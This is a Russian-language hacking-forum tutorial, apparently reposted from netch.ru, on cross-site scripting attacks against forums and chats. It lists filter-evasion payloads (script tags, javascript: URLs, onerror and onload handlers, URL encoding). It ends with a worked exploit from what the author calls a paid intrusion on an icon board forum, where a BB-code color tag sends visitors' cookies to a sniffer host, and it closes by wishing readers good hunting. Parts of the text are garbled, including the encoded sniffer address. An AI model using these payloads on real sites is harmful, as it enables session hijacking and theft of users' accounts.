Форум АНТИЧАТ - Xss — основные ходы

Сейчас по всему интернету можно встретить большое количество разнообразных форумов, гостевых книг, чатов, сайтов и других средств, созданных для нашего с вами общения. На всех этих сайтах можно выделить одну особенность — вы можете изменять их содержание и эти изменения, понятное дело, контролируются админами этих сайтов: фильтруются неугодные символы и все такое. Но иногда возникает момент, когда эти изменения выходят из под контроля. Тогда можно провести все, что угодно: php-инклудинг, SQL-инъекция и, тема этой статьи — XSS атаки.

XSS расшифровывается ка Crossing Site Scripting. Он же межсайтовый скриптинг. Абривиатура могла бы быть CSS, но это уже забито Caskading Style Sheets — стилем. О нем позже;)

Вся суть этой атаки заключается в том, что вы внедряете свой скрипт в чужую страницу, а этот скрипт уже работает на вас: крадет чужие куки, заставляет окно закрываться, в скрипт вмонтируется какой-нибудь сплоит и т. д.

Теперь вся проблема заключается в том, КАК вставить свой скрипт в чужую страницу. Я опишу все известные мне методы, подразделив их на группы.

BB-XSS.
Вы наверное часто замечаете, что форумы, чаты и etc почти всегда дают своим пользователям возможность использовать различные виды начертаний, шрифта, цвета применительно к тексту, вставка картинок, смайликов и т.д. В реализации этого не последнюю роль играет использование кодов BB: выражений в квадратных скобках, которые при парсинге станун тегами. Например,

перейдет в <b>
[i] в <i>

и т.д.
Не разрешать же юзерам внедрять в страницу какой не попадя код? Пусть обходяться BB кодами...

Итак, нам надо вставить скрипт.
Первое, что вообще надо учитывать, это какие символы и в каком месте фильтруются. Нам может понадобиться один или несколько следующих символов:' ' < > ( ) " ; - ! + = & { }`
Поэтому просто вставляем это в тело страницы и смотрим, что фильтруется, а что нет. Учитываем небольшую особенность, что в BB тегах оно может фильтроваться, а вне нет. Но это можно обойти. Если чего-то не достает и упорно фильтруется, то это остается одно — закодировать.
Пара слов о кодировке.
Особенность парсинга текста в браузерах заключается в том, что расшифровка символов происходит до выполнения скрипта. Это значит например, что<IMG SRC=javascript:alert("XSS")>
перейдет в <IMG SRC=javascript:alert("XSS")>, а затем выполнится.
Закодировть эти символы с текстовыми метками можно:

" " двойная кавычка
& & амперсанд
< < знак 'меньше'
> > знак 'больше'

Давайте с вами разберемся, какими способами мы вообще можем вставлять скрипты в тело страницы.

[B]Непосредственно
<script>alert('lol');</script>
Эта возможность выпадает редко и в основном в какой-нибудь личной информации пользователя, полях, который не редактируются с тектовых полей, но значения которых можно изменить в post или get запросе: например принудительно перехватить и послать на сервер подделанный пакет:
допустим передается в пакете имя скажем цвета (red) мы можем переделать его в
red'" >, тестируя таким образом на символы. Если что-то сработает и не отфильтруется, xss обеспечена.
это может принять форму
<tgname ***'red'"><script>...
в тег тоже можно так залезть, выходя из кавычек.
О подделке пакетов смотрите другие разделы.
Чтобы избежать фильтрации, можно изменить регистр
<sCript>
Через ссылку на скрипт посредством javascript: или vbscript:
<*** src(href,url)="javascript:alert('lol')">
<META HTTP-EQUIV="Refresh" CONTENT=3; URL=javascript:alert('lol')">
здесь, если название тега будет img/image, iframe, то скрипт выполниться сразу, поскольку браузер попытается подгрузить ее содержимое и наткнется на наш скрипт. Если это будет ссылка, то браузер будет ждать, пока пользователь нажмет ее.
То же со стилем:
<*** style=backround:url("javascript:alert('lol'")>;
это метод плох тем, что javascript: фильтруется и сложно найти лазейку в скрипте фильтрации, которая оставит javascrip:
Через события.
В DHTML существует события, которые запускают скрипты.
например событие onload применяется при загрузке картинок, фреймов, окон.
<img src=images/smile.gif onload=alert('lol')>
Не оставлю незамеченными такие события как
onerror="при возникновении ошибки";
onmouseover="при наведении курсора мышки";
onmouseout="при убратии курсора с объекта";

Остановлю ваше внимание на событии onerror
удобно дать какой-нибудь картинке одрес, который никуда не ведет, что повлечет ошибку и выполнение скрипта
<img/image src="images/smile.gifadalshexss"onerror=alert('lol')>
через url браузера. Иногда случается, что код, который отображается в URL, становиться частью страницы. Тогда мы пишем этот код в урл, предварительно замаскировав его. Понятно, что это нада искать.
Somesite.dn/forum/?somevar=<script>alert('lol')</script>
Somesite.dn/forum/?somevar=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2 8%27%6C%6F%6C%27%29%3C%2F%73%63%72%69%70%74%3E

Похоже это все, а теперь перейдем к частностям.
В частности наличие xss-уязвимости позволяет тащить куки с сайта, а затем вставлять себе и становиться теми, у кого эти куки были взяты.
Если уязвимость межскриптовая, то должны быть наш скрипт на сайте и еще прога, которая ловит то, что мы взяли. Например посредством GET-запроса.
С чужого сайта приходит запрос типа netch.ru/**/pass=123&login=chel
у нас находится скрипт, который ловит этот запрос и записывает в лог.

А теперь небольшой пример с icon board.
Взлом этот начался с заказа, поэтому подробности не раскрываются.

Сначала я попробовал javascript:, но скрипт предупредил меня о серьезных намерениях рассказать все админу.
Тогда я начал химичить с подстановкой одного тега в другой и понял, что
внутри тега тег [color] не фильтруется. Отлично. Идем дальше. Пробуем вставить событие. После названия цвета. Но гадина не восприимала пробелы и выводила все, как обычный текст. Можно было поставить /, но я решил попробовать напрямую. И не пожалел. [COLOR=onerror='alert(1)']y' работает. Все. Остается тока добавить снифер и собрать сплоит. Но почему адреса с точками упорно не принимались. Тогда я просто воспользовался тулзой по перекодеровке и все заработало [COLOR=onerror='a=String.fromCharCode(108,111,108); alert(a)']y' Теперь все готово и мы собираем сполит
[COLOR=onerror='img=new/**/Image();a=String.fromCharCode(а,д,р,е,с,,с,� �,и,ф,е ,р,а,_,с,o,d,e,d);img.src=a+document.cookie']y'
И ждем теперь куков.

Вроде бы и все и.. удачной охоты.

Взято с netch.ru